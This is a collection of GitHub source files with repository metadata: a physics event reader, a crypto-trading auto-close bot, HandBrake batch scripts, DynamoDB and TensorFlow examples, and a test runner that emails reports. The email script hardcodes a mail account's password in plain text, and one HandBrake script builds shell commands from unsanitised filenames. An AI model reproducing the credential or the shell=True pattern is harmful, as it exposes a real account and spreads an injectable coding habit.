"text": "\n# Analyze UrQMD Events with Python\n\nThis Python code was created to read the output files written by heavy ion collision simulations with UrQMD.\n\n### Other Related Code / Alternatives\n\n* [urqmd-observables](https://github.com/jbernhard/urqmd-observables), C++ code to read UrQMD `.f13` output files.\n* [ebe-analysis - Tools for analyzing event-by-event heavy-ion collision simulation data.](https://github.com/jbernhard/ebe-analysis)\n\n### Author\n\n* Philipp Klaus <[email protected]>\n\n"
},
{
"alpha_fraction": 0.54130619764328,
"alphanum_fraction": 0.5555555820465088,
"avg_line_length": 42.65925979614258,
"blob_id": "2151b28ebdb14879eecd7cd483506223a3562bac",
"content_id": "e89d60c3d8949de99a3206d50eeb1e1dd49d18cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5895,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 135,
"path": "/read_urqmd_pandas.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport tables\nimport argparse\nimport logging\nimport warnings\nimport multiprocessing\nimport time\nimport queue\n\n\nclass F14_Reader(object):\n\n def __init__(self, data_file, add_event_columns=False, renumber_event_ids=True):\n self.data_file = data_file\n self.add_event_columns = add_event_columns\n self.renumber_event_ids = renumber_event_ids\n\n def get_dataframe(self):\n return pd.concat(list(self.iter_dataframes()), ignore_index=True)\n\n def iter_dataframes(self, chunksize=100000):\n curr_event_id = 0\n curr_impact = 0.0\n names = ['r0', 'rx', 'ry', 'rz', 'p0', 'px', 'py', 'pz', 'm', 'ityp', '2i3', 'chg', 'lcl#', 'ncl', 'or']\n for df in pd.read_table(self.data_file, names=names, delim_whitespace=True, chunksize=chunksize):\n logging.info('Read {} lines from {}.'.format(len(df), self.data_file.name))\n # -- add additional event_* columns\n if self.add_event_columns:\n #total_event_no = len(df[df.r0 == 'UQMD'])\n df['event_id'] = curr_event_id\n df['event_ip'] = curr_impact\n event_start = None\n for idx in df[df.r0 == 'UQMD'].index:\n # remember the index where the event started\n if event_start == None:\n event_start = idx\n continue\n curr_impact = df.loc[event_start+3, 'rx']\n # set curr_event_id\n if self.renumber_event_ids:\n curr_event_id += 1\n else:\n curr_event_id = df.loc[event_start+5, 'rx']\n # update event_id and event_ip for the event from event_start (the current event) to idx (the new event)\n df.loc[event_start:idx, 'event_ip'] = curr_impact\n df.loc[event_start:idx, 'event_id'] = curr_event_id\n event_start = idx\n # update particles belonging to the last event\n curr_impact = df.loc[event_start+3, 'rx']\n if self.renumber_event_ids:\n curr_event_id += 1\n else:\n curr_event_id = df.loc[event_start + 5, 'rx']\n df.loc[event_start:, 'event_id'] = curr_event_id\n df.loc[event_start:, 'event_ip'] = curr_impact\n # -- end add event_* columns\n df = df[df['or'].notnull()]\n df = df.convert_objects(convert_numeric=True)\n df.dropna(how='any', inplace=True)\n if self.add_event_columns:\n df['event_id'] = df['event_id'].astype(np.uint32)\n df['event_ip'] = df['event_ip'].astype(np.float32)\n df['r0'] = df['r0'].astype(np.float32)\n df['rx'] = df['rx'].astype(np.float32)\n df['ry'] = df['ry'].astype(np.float32)\n df['rz'] = df['rz'].astype(np.float32)\n df['p0'] = df['p0'].astype(np.float32)\n df['px'] = df['px'].astype(np.float32)\n df['py'] = df['py'].astype(np.float32)\n df['pz'] = df['pz'].astype(np.float32)\n df['m'] = df['m'].astype(np.float32)\n df['ityp'] = df['ityp'].astype(np.int16)\n df['2i3'] = df['2i3'].astype(np.int8)\n df['chg'] = df['chg'].astype(np.int8)\n df['lcl#'] = df['lcl#'].astype(np.uint32)\n df['ncl'] = df['ncl'].astype(np.uint16)\n df['or'] = df['or'].astype(np.uint16)\n yield df\n\n\nclass HDF_Worker(multiprocessing.Process):\n\n def __init__(self, h5_path, queue):\n self.h5_path = h5_path\n self.queue = queue\n self.block_period = .01\n super(HDF_Worker, self).__init__()\n\n def run(self):\n self.hdf = pd.HDFStore(self.h5_path)\n original_warnings = list(warnings.filters)\n warnings.simplefilter('ignore', tables.NaturalNameWarning)\n while True:\n try:\n # get queue content\n qc = self.queue.get(timeout=self.block_period)\n except queue.Empty:\n continue\n if type(qc) == str and qc == 'EOF': break\n self.hdf.append('particles', qc, data_columns=True, index=False)\n self.hdf.close()\n warnings.filters = original_warnings\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r', encoding='ascii'), help=\"Must be of type .f14\")\n parser.add_argument('out_file', metavar='OUT_FILE', help='The HDF5 (.h5) file to store the information in')\n parser.add_argument('--no-event-columns', action='store_true', help=\"Don NOT include columns for the event number and event impact parameter.\")\n parser.add_argument('--chunksize', type=int, default = 100000, help='The number of lines to read in one go.')\n parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'], default='INFO', help=\"How verbose should the output be\")\n args = parser.parse_args()\n\n logging.basicConfig(level=args.verbosity, format='%(asctime)s.%(msecs)d %(levelname)s %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n queue = multiprocessing.Queue()\n worker = HDF_Worker(args.out_file, queue)\n worker.start()\n for df in F14_Reader(args.urqmd_file, not args.no_event_columns).iter_dataframes(chunksize = args.chunksize):\n logging.debug(\"DataFrame ready to be written to file.\")\n if not queue.empty(): time.sleep(0.05)\n logging.debug(\"Queue empty. DataFrame will be put into write queue now.\")\n queue.put(df.copy())\n queue.put('EOF')\n queue.close()\n queue.join_thread()\n worker.join()\n\nif __name__ == \"__main__\":\n main()\n\n"
}
] | 5 |
rube-de/1broker-autoclose | https://github.com/rube-de/1broker-autoclose | b2355bf8bec7beb3d3ed5f02b8ccde2e7e812c4a | 6f67eb9c9421db3f841964b726002f88273e84fc | a7aa62ae27b6d43f1a05233e96d26d93f176b8a7 | refs/heads/master | 2021-07-11T12:03:00.440204 | 2017-10-11T12:37:01 | 2017-10-11T12:37:01 | 105,642,440 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5567155480384827,
"alphanum_fraction": 0.5660271048545837,
"avg_line_length": 33.06730651855469,
"blob_id": "df9bbe42276b1bc86c01fe08749f16edd19ba763",
"content_id": "a1f7235b41475933cc1553b503bbdcae83c5514b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3551,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 104,
"path": "/auto_sell.py",
"repo_name": "rube-de/1broker-autoclose",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport logging\n\nimport ccxt\nimport time\nimport datetime\n\n\ndef get_exchange(exchange_id):\n try:\n exchange = getattr(ccxt, exchange_id)({\n 'apiKey': api,\n 'secret': secret,\n 'verbose': False\n })\n except KeyError as e:\n print(\"error: \" + str(e))\n print(\"return exchange without api\")\n exchange = getattr(ccxt, exchange_id)()\n return exchange\n\n\ndef get_trigger_positive(username):\n if username == 'snortex':\n return 200\n elif username == '333':\n return 50\n else:\n return trigger_positive_def\n\n\ndef get_trigger_negative(username):\n if username == 'snortex':\n return -50\n elif username == '333':\n return -10\n else:\n return trigger_negative_def\n\n\n# enter here your api key from 1broker\napi = \"\"\nsecret = \"\"\nexchange_id = \"_1broker\"\n# interval to check the orders in secs\ntime_interval = 60*5\n\n# triggers when to close an order\n# close at +XX%\ntrigger_positive_def = 50\n# close at -XX%\ntrigger_negative_def = -10\n\n# logging file\nlogging.basicConfig(filename=\"1broker_sell.log\", format=\"%(asctime)s %(levelname)s : %(message)s\", level=logging.INFO)\n\nexchange = get_exchange(exchange_id)\n\nwhile True:\n try: \n open_positions = exchange.privateGetPositionOpen()['response'] \n \n curTime = time.time() \n mydate = datetime.datetime.fromtimestamp(curTime) \n mydate = mydate.strftime('%Y%m%d_%H:%M:%S') \n print(\"--- {0:s} ----------------------------------------\".format(mydate)) \n print(\"{1:d} open positions found\".format(mydate, len(open_positions)))\n\n for pos in open_positions:\n pos_id = pos['position_id']\n pos_profit = float(pos['profit_loss'])\n pos_profit_percent = float(pos['profit_loss_percent'])\n pos_stop_loss = float(pos['stop_loss'])\n pos_entry = float(pos['entry_price'])\n\n # for copied trades\n pos_copy = pos['copy_of'] \n if (pos_copy != None) and (int(pos_copy) > 0): \n shared_position = exchange.privateGetPositionSharedGet({'position_id': pos_copy})['response'] \n username = shared_position['username']\n else:\n username = '-- own --'\n pos_copy = str(-1)\n\n # use this for different trader settings \n trigger_positive = get_trigger_positive(username)\n trigger_negative = get_trigger_negative(username)\n\n if pos_profit_percent > 0 and pos_profit_percent > trigger_positive:\n print(\" profit trigger {0:d}% reached, trade closed\".format(trigger_positive))\n logging.info(\"Close position: \" + pos_id + \" (\" + username + \") with profit: \" + str(pos_profit_percent) + \"%\")\n # exchange.privateGetPositionClose({'position_id': pos_id})\n elif pos_profit_percent < 0 and pos_profit_percent < trigger_negative:\n print(\" loss trigger {0:d}% reached, trade closed\".format(trigger_negative))\n logging.info(\"Close position: \" + pos_id + \" (\" + username + \") with loss: \" + str(pos_profit_percent) + \"%\")\n # exchange.privateGetPositionClose({'position_id': pos_id})\n except: \n (type, value, traceback) = sys.exc_info()\n print(\"Exception:\")\n print(type)\n print(value)\n print(traceback)\n print()\n time.sleep(time_interval)\n"
},
{
"alpha_fraction": 0.7455295920372009,
"alphanum_fraction": 0.763411283493042,
"avg_line_length": 32.76744079589844,
"blob_id": "9a10042a88d1094d1778ad4986db5b299d0b10d9",
"content_id": "0afd49eb851180744180a301304a6120bb507109",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1454,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 43,
"path": "/README.md",
"repo_name": "rube-de/1broker-autoclose",
"src_encoding": "UTF-8",
"text": "# 1broker-autoclose\n\nA little pyhton script to check 1broker with a timed intervall and close positions if they reached a trigger.\n\n## Requirements:\n* Python 3.6\n* ccxt library\n\nCheck what python you have installed with: \n\n`python -V`\n\n=> if it is not Python3.6 => Install Python 3.6 from https://www.python.org/downloads/\n\nAfter that install the ccxt library via pip:\n\n`pip install ccxt` (if you only have one python version installed)\n`pip3.6 install ccxt` (if you have multiple python version installed)\n\n## usage:\nOpen auto_sell.py with an editor/notepad and add your api-key, the timeinterval you want to run the script and the positive and negative triggers. After that you can run the script with\n`python3.6 auto_sell.py`\n\n(the real execution is commented out, if you are satisfied with the actions in the log you have to remove the `#` in the while loop)\n\n\n\n\n## extra:\nThere is also a google script which will check gains.\nYou will need to edit the script to add your api-key as token and have a google sheet named like in the script (my sheet is called BTCBalance)\n\nHint: use triggers in the google script: edit>current project triggers to run the e.g. every working day at 2pm\n\nThe first row on the sheet is:\n\ndate \tbalance \torders_worth \tpositions_worth \tnet_worth\tGain BTC\tGain %\n\n\n\n### if you want to pay me a beer you are free to send some tip here\n* bitcoin: 3NRdkqjeq4DCLeK1B5phfDc996BwHgsAvo\n* dash: Xhheppe83wqdy3fFkMidUXa1CUNp2mEou5\n\n\n"
}
] | 2 |
alexandre-guillaume/scripthandbrake | https://github.com/alexandre-guillaume/scripthandbrake | 20fcf3974c3e1c2bcaec9a86f62cc1e8dcee75c9 | 5fd31aac23944982a0b90c739f2c7365e7dfe6e4 | ed96d65137fb102bc1c264ce49e32dbf7f2fb579 | refs/heads/master | 2021-01-17T06:49:39.424558 | 2018-03-02T19:56:11 | 2018-03-02T19:56:11 | 54,312,990 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7915105819702148,
"alphanum_fraction": 0.8052434325218201,
"avg_line_length": 41.157894134521484,
"blob_id": "8dfd9b0223d0c41568116f575655573a5c6aacd2",
"content_id": "45d3676bee8bd35406206a11cb968fd73dc1bdf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 19,
"path": "/README.md",
"repo_name": "alexandre-guillaume/scripthandbrake",
"src_encoding": "UTF-8",
"text": "# scripthandbrake\nthis is a litle python script who check the folder and list file then use handbrakeCLI to convert all video in x265.\n\nuse\non windows (in the folder that contain handbrakeCLI.exe and scripthandbrakev2.py)\npython scripthandbrakev2.py \"path\\directory\"\n(be careful windows don't allow space in path or file)\n\nif you want to change filename use\npython scripthandbrakev2.py \"path\\directory\" \"newFilename\"\n\nif you want to change filename and directory use\npython scripthandbrakev2.py \"path\\directory\" \"newFilename\" \"path\\otherdirectory\"\n\non linux and probably macos\npython ./scripthandbrakev2-linux.py path/directory\n\nthe file scripthanbrakev2.py must be in the directory where HandbrakeCLI is (only for windows), else it will not run \nit work on windows and linux (ubuntu) with python 2.7\n"
},
{
"alpha_fraction": 0.6466302275657654,
"alphanum_fraction": 0.6624165177345276,
"avg_line_length": 31.612245559692383,
"blob_id": "ba2159213e360556fd44ebddff517cac5c1a1ee2",
"content_id": "1e16412ecf32d0308b143c211b86d3b163bfa4b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1647,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 49,
"path": "/scripthandbrakev2.py",
"repo_name": "alexandre-guillaume/scripthandbrake",
"src_encoding": "UTF-8",
"text": "# -*-coding:Latin-1 -*\r\nimport random\r\nimport os \r\nimport subprocess\r\nimport sys , getopt\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n# utilisation python scripthandbrakev2.py \"chemin de fichier\" \r\n# le script va faire un listing des fichier dans le dossier et va convertir les video en x265\r\n\r\n#ATTENTION il ne faut pas d'espace dans le chemin vers les fichier n'y dans les fichier, nulle part\r\n\r\n# https://handbrake.fr/docs/en/latest/cli/cli-guide.html\r\ndef main(argv):\r\n\thandbrakecli = \"HandbrakeCLI.exe\"\r\n#\toption = \" -f mkv -P -e x265 -q 20 -B 160\"\r\n\toption = \" -f mkv -P -e x265 -q 21 -E copy\"\r\n\tinputfile = sys.argv[1]\r\n\tprint 'nombre argument', len(sys.argv)\r\n\toutputfile = inputfile\r\n\tnouveauNom = ''\r\n\tif len(sys.argv) > 3:\r\n\t\toutputfile = sys.argv[3]\r\n\telif len(sys.argv) > 2:\r\n\t\tnouveauNom = sys.argv[2]\r\n\r\n\tindice = 1\r\n\tonlyfiles = [f for f in listdir(inputfile) if isfile(join(inputfile, f))]\r\n\tprint 'liste de fichiers', onlyfiles\r\n\tfor f in onlyfiles:\r\n\t\tcomandein = inputfile + '\\\\' + f\r\n\t\t#test si nouveauNom\r\n\t\tif len(nouveauNom) == 0: \r\n\t\t\tcomandeout = outputfile + '\\\\' + f + '.mkv'\r\n\t\telse:\r\n\t\t\tcomandeout = outputfile + '\\\\' + nouveauNom + '_' + str(indice) + '.mkv'\r\n\t\tcommandeligne = handbrakecli + \" -i \" + comandein + \" -o \" + comandeout + option\r\n\t\t#subprocess.Popen lance les X commande ou a utiliser sur cluster ou cpu avec beaucoup de coeur\r\n\t\t#subprocess.Popen(commandeligne)\r\n\t\tproc = subprocess.Popen(commandeligne)\r\n\t\tproc.wait()\r\n\t\tindice +=1\r\n\t\t#pas de i++ en python\r\n\t\tprint 'un fichier terminer'\r\n\tprint 'terminer'\r\nif __name__ == \"__main__\":\r\n main(sys.argv)\r\n\r\n#os.system(\"pause\")\r\n"
},
{
"alpha_fraction": 0.6726093888282776,
"alphanum_fraction": 0.6896272301673889,
"avg_line_length": 28.35714340209961,
"blob_id": "49cd916f84cdc20c6f87fe0b525afa262fd22060",
"content_id": "824dba5cf82c34c0d3eab8388a641ab610f40b95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1234,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 42,
"path": "/scripthandbrakev2-linux.py",
"repo_name": "alexandre-guillaume/scripthandbrake",
"src_encoding": "UTF-8",
"text": "# -*-coding:Latin-1 -*\nimport random\nimport os \nimport subprocess\nimport sys , getopt\nfrom os import listdir\nfrom os.path import isfile, join\n# utilisation python scripthandbrakev2.py \"chemin de fichier\" \n# le script va faire un listing des fichier dans le dossier et va convertir les video en x265 \ndef main(argv):\n\thandbrakecli = \"HandBrakeCLI\"\n\toption = \" -f mkv -P -e x265 -q 20 -B 160\"\n\tinputfile = sys.argv[1]\n\n\tprint sys.argv[0]\n\tprint sys.argv[1]\n\n\tprint 'nombre argument', len(sys.argv)\n\tif len(sys.argv) > 2:\n\t\toutputfile = sys.argv[2]\n\telse:\n\t\toutputfile = inputfile\n\n\n\tonlyfiles = [f for f in listdir(inputfile) if isfile(join(inputfile, f))]\n\tprint 'liste de fichiers', onlyfiles\n\tfor f in onlyfiles:\n\t\tcomandein = inputfile + '/' + f \n\t\tcomandeout = outputfile + '/' + f + '.x265' \n\t\tcommandeligne = handbrakecli + \" -i \" + comandein + \" -o \" + comandeout + option\n\t\t#subprocess.Popen lance les X commande ou a utiliser sur cluster ou cpu avec beaucoup de coeur\n\t\t#subprocess.Popen(commandeligne)\n\t\t\n\t\t#subprocess.call([\"ls\", \"-l\"])\n\t\tproc = subprocess.Popen(commandeligne, shell=True)\n\t\tproc.wait()\n\t\tprint 'un fichier terminer'\n\tprint 'terminer'\nif __name__ == \"__main__\":\n main(sys.argv)\n\n#os.system(\"pause\")\n\n"
}
] | 3 |
ErickRosete/dynamodb | https://github.com/ErickRosete/dynamodb | 9031ca8e43a6fb5f1c6680a622aae8e74d09e9d4 | f2b5a8f0b6cfc521aa062dfcce06b2beed01da81 | 093852c7680f2ecf53be819dec03f7748a216d75 | refs/heads/master | 2020-07-27T05:16:05.105260 | 2019-09-16T20:00:47 | 2019-09-16T20:00:47 | 208,881,998 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6516854166984558,
"alphanum_fraction": 0.6516854166984558,
"avg_line_length": 28.33333396911621,
"blob_id": "c5f8fb66304513660719d00765cd4ebf9f828687",
"content_id": "78f004828f290c483f25eadfaa2ff4c1eee17c69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/setting-env-variables.py",
"repo_name": "ErickRosete/dynamodb",
"src_encoding": "UTF-8",
"text": "import os\nos.environ[\"AWS_ACCESS_KEY_ID\"] = \"\"\nos.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"\"\n\n"
},
{
"alpha_fraction": 0.6792009472846985,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 27.399999618530273,
"blob_id": "9d500e11a21712cc7cc5b488c4b5e8cda4ba0bad",
"content_id": "e7e12071ab70443f2efc3ce92a562aa6c411abfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 30,
"path": "/dynamodb.py",
"repo_name": "ErickRosete/dynamodb",
"src_encoding": "UTF-8",
"text": "import boto3\nfrom datetime import datetime\nfrom decimal import Decimal\nimport json\n\n#EE.UU. Este (Ohio)\tus-east-2\trds.us-east-2.amazonaws.com\tHTTPS\n#EE.UU. Este (Norte de Virginia)\tus-east-1\trds.us-east-1.amazonaws.com\tHTTPS\n#EE.UU. Oeste (Norte de California)\tus-west-1\trds.us-west-1.amazonaws.com\tHTTPS\n#EE.UU. Oeste (Oregón)\tus-west-2\trds.us-west-2.amazonaws.com\tHTTPS\ndynamodb = boto3.resource('dynamodb', region_name ='us-east-2' )\n\ntable = dynamodb.Table('SmartLabs')\nprint(table.creation_date_time)\n\n\nnow = datetime.now()\ntimestamp = str(now)\n#timestamp = datetime.timestamp(now)\n\nitem={\n 'Indice': 1,\n 'Identificación': 'Lab-Rob',\n 'Parameter': 'Humidity',\n 'TimeStamp': timestamp,\n 'Valor': 30\n }\n\nitem_dump = json.dumps(item)\nitem = json.loads(item_dump, parse_float=Decimal)\ntable.put_item(Item = item)"
}
] | 2 |
jiangtian20132045/tt | https://github.com/jiangtian20132045/tt | 7bec1a89ea6d8ac0e9b587490cd4ce3704a807e3 | baa628882c5c6815752dd0cbb4d82f6ec9f3b62f | 38787020bf4b87ff20326aed6cf987ecd79dd2c6 | refs/heads/master | 2020-03-23T09:45:48.549260 | 2018-07-18T09:48:33 | 2018-07-18T09:48:33 | 141,406,693 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5464617013931274,
"alphanum_fraction": 0.5505313277244568,
"avg_line_length": 29.937063217163086,
"blob_id": "64c105277270f6d54378638dec099faabf551a66",
"content_id": "65e5d97933c1ebf88988548b9fb0e2385f155437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4991,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 143,
"path": "/tt/run_all_case.py",
"repo_name": "jiangtian20132045/tt",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport unittest\nimport os\nfrom report import HTMLTestRunner_TT\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport time\n\n# base_dir = str(os.path.dirname(os.path.dirname(__file__)))\n# base_dir = str(os.path.dirname(os.path.realpath(__file__)))\n# cur_path = base_dir.replace(\"\\\\\",\"/\")\ncur_path = str(os.path.dirname(os.path.realpath(__file__)))\n# print(base_dir)\nprint(cur_path)\ndef add_case(caseName=\"case\",rule=\"test*.py\"):\n #待执用例的目录\n # case_dir = \"C:\\\\Users\\\\Administrator\\\\PycharmProjects\\\\oldrequest\\\\case\"\n #第一步:加载所有的测试用例\n #用例文件夹\n case_path = os.path.join(cur_path,caseName)\n if not os.path.exists(case_path):\n os.mkdir(case_path)\n print(\"test case path:%s\"%case_path)\n #定义discover方法的参数\n discover = unittest.defaultTestLoader.discover(case_path,\n pattern=\"test*.py\",\n top_level_dir=None)\n print(discover)\n return discover\n\n # case_dir = base_dir+\"/case/\"\n # print(case_dir)\n # testcase = unittest.TestSuite()\n\n # discover = unittest.defaultTestLoader.discover(case_dir,\n # pattern=\"test*.py\",\n # top_level_dir=None)\n\n #discover方法筛选出来的用例,循环添加到测试套件中\n # for test_suite in discover:\n # for test_case in test_suite:\n # #添加用例到testcase\n # testcase.addTests(test_case)\n # print(testcase)\n # return testcase\n\ndef send_email():\n # --1.跟发邮件相关的参数--\n # 发件服务器\n #企业邮箱的服务,如果是个人就用smtp.163.com\n smtpsever = \"smtp.qiye.163.com\"\n # 端口 port\n port = 0\n #账号\n sender = \"[email protected]\"\n #密码\n psw = \"grandstream@jia1\"\n #接收人(多个收件人时采用list对象)\n receiver = [\"[email protected]\",\"[email protected]\"]\n\n #--2.这里是邮件的内容\n\n fire_path = cur_path+\"\\\\report\\\\result.html\"\n with open(fire_path,'rb') as fp:\n mail_body = fp.read()\n # fp.close()\n msg = MIMEMultipart()\n\n subject = \"这个是主题666\"\n msg['form'] = sender\n #多个收件人时,recevier是list,但是这个字典中需要的类型是字符串\n msg['to'] = (\";\").join(receiver)\n print((\";\").join(receiver))\n msg['subject'] = subject\n #定义邮件正文为html格式\n #正文\n body = MIMEText(mail_body,\"html\",\"utf-8\")\n #附件\n att = MIMEText(mail_body,'base64','utf-8')\n att[\"Content-Type\"] = 'application/octet-stream'\n att['Content-Disposition'] = 'attachment;filename=\"result.html\"'\n msg.attach(body)\n msg.attach(att)\n print(\"test email is send\")\n\n#--3.发送邮件\n try:\n smtp = smtplib.SMTP()\n #连接服务器\n smtp.connect(smtpsever)\n #登录\n smtp.login(sender,psw)\n except:\n smtp = smtplib.SMTP_SSL(smtpsever,port)\n smtp.login(sender,psw)\n smtp.sendmail(sender,receiver,msg.as_string())\n smtp.quit()\n\n#生成html报告\ndef run_case(all_case,reportName=\"report\"):\n \"\"\"\"第二步:执行所有的用例,并把结果写入HTML测试报告\"\"\"\n now = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\n #用例文件夹\n report_path = os.path.join(cur_path,reportName)\n #如果不存在就自动创建一个\n if not os.path.exists(report_path):\n os.mkdir(report_path)\n report_abspath = os.path.join(report_path+\"\\\\result.html\")\n print(report_path)\n print(\"report path: %s\"%report_abspath)\n fp = open(report_abspath, \"wb\")\n # runnrer = unittest.TextTestRunner()\n # run所有用例\n runnrer = HTMLTestRunner_TT.HTMLTestRunner(stream=fp,\n title=\"这是我的自动化测试报告\",\n description=\"用例执行情况\",\n TT_name=\"jiangtian\")\n runnrer.run(all_case)\n fp.close()\n\n# def get_report_file(report_file):\n# #获取最新的测试报告\n\nif __name__ == \"__main__\":\n #返回实例\n # report_path = base_dir+\"/result.html\"\n # fp = open(report_path,\"wb\")\n # runnrer = unittest.TextTestRunner()\n #run所有用例\n # runnrer = HTMLTestRunner_TT.HTMLTestRunner(stream=fp,\n # title=\"这是我的自动化测试报告\",\n # description=\"用例执行情况\",\n # TT_name=\"jiangtian\")\n # runnrer.run(add_case())\n # fp.close()\n #加载用例\n all_case = add_case()\n #执行用例\n run_case(all_case)\n #获取最新生成的测试报告文件\n report_path = os.path.join(cur_path,\"report\")\n send_email()"
},
{
"alpha_fraction": 0.694915235042572,
"alphanum_fraction": 0.6991525292396545,
"avg_line_length": 21.4761905670166,
"blob_id": "606beeada81403e87d4d5acfee7f147ce2879765",
"content_id": "988b08a78575dd06b14d198fd4e4301ae3a97f19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 21,
"path": "/tt/case/test_03.py",
"repo_name": "jiangtian20132045/tt",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nfrom bs4 import BeautifulSoup\nimport requests\n\n# r = requests.get(\"http://www.cnblogs.com/yoyoketang\")\n# #请求后获取整个页面\n# result = r.content\n# print(result)\n#\n# #用html.parser解析html\n# soup = BeautifulSoup(result,\"html.parser\")\n#\n# #获取所有的class属性为dayTitle,返回tag类\n# times = soup.find_all(class_=\"dayTitle\")\n# for i in times:\n# a = i\n# print(i.a.string)\n\nyoyo = open(\"tt.html\",encoding='gbk',errors='ignore')\nsoup = BeautifulSoup(yoyo)\nprint(soup.prettify())\n"
}
] | 2 |
himvish997/tensorflow-tutorial | https://github.com/himvish997/tensorflow-tutorial | 21330201108b3b2b99c0eab36877a5788c57dcf7 | dda78dfb8837a2f636abb785b3785678e909f21b | 30f71675b07d4d00d2045f86ecf21d32065f991f | refs/heads/master | 2020-05-21T01:02:36.453381 | 2019-06-02T13:52:55 | 2019-06-02T13:52:55 | 185,845,532 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6186291575431824,
"alphanum_fraction": 0.6590509414672852,
"avg_line_length": 38.27586364746094,
"blob_id": "eabfe651e0f4f7002586c08a577b1f628b6a6ed8",
"content_id": "a8e0dc43bce26babffbab74ebbb5c3e11f3d1fb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1140,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 29,
"path": "/LeNet-5/download_data.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: download_data.py\n'''Let’s import the MNIST data from the tensorflow library. The MNIST database\ncontains 60,000 training images and 10,000 testing images. Each image is of\nsize 28*28*1. We need to resize it to 32*32*1 for the LeNet-5 Model.'''\n\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n\ndef train_data():\n mnist = input_data.read_data_sets(\"MNIST_data/\", reshape=False, one_hot = True)\n X_train, y_train = mnist.train.images, mnist.train.labels\n X_train = np.pad(X_train, ((0,0), (2,2), (2,2), (0,0)), 'constant')\n return X_train, y_train\n\n\ndef val_data():\n mnist = input_data.read_data_sets(\"MNIST_data/\", reshape=False, one_hot = True)\n X_val, y_val = mnist.validation.images, mnist.validation.labels\n X_val = np.pad(X_val, ((0,0), (2,2), (2,2), (0,0)), 'constant')\n return X_val, y_val\n\n\ndef test_data():\n mnist = input_data.read_data_sets(\"MNIST_data/\", reshape=False, one_hot = True)\n X_test, y_test = mnist.test.images, mnist.test.labels\n X_test = np.pad(X_test, ((0,0), (2,2), (2,2), (0,0)), 'constant')\n return X_test, y_test"
},
{
"alpha_fraction": 0.6223359107971191,
"alphanum_fraction": 0.6285876631736755,
"avg_line_length": 41.409637451171875,
"blob_id": "5b8b4fb255b4f1be1481b42805fe37036e13b848",
"content_id": "71b0b07f6db42c70e7c79775c9d1e992c2e07457",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3519,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 83,
"path": "/LeNet-5/Feedable_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: Feedable_iterator.py\n\nimport tensorflow as tf\nimport numpy as np\nfrom model import model\n\n# Feedable iterator\n'''This iterator provides the option of switching between various iterators. \nWe can create a re-initializable iterator for training and validation purposes. \nFor inference/testing where you require one pass of the dataset, We can use \nthe one shot iterator.'''\n\ndef Feedable_iterator(X_train, y_train, X_val, y_val, X_test, y_test):\n epochs = 10\n batch_size = 64\n\n tf.reset_default_graph()\n\n X_data = tf.placeholder(tf.float32, [None, 32, 32, 1])\n Y_data = tf.placeholder(tf.float32, [None, 10])\n\n train_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size)\n val_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size)\n\n test_dataset = tf.data.Dataset.from_tensor_slices((X_test, y_test.astype(np.float32))).batch(batch_size)\n\n handle = tf.placeholder(tf.string, shape=[])\n iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, 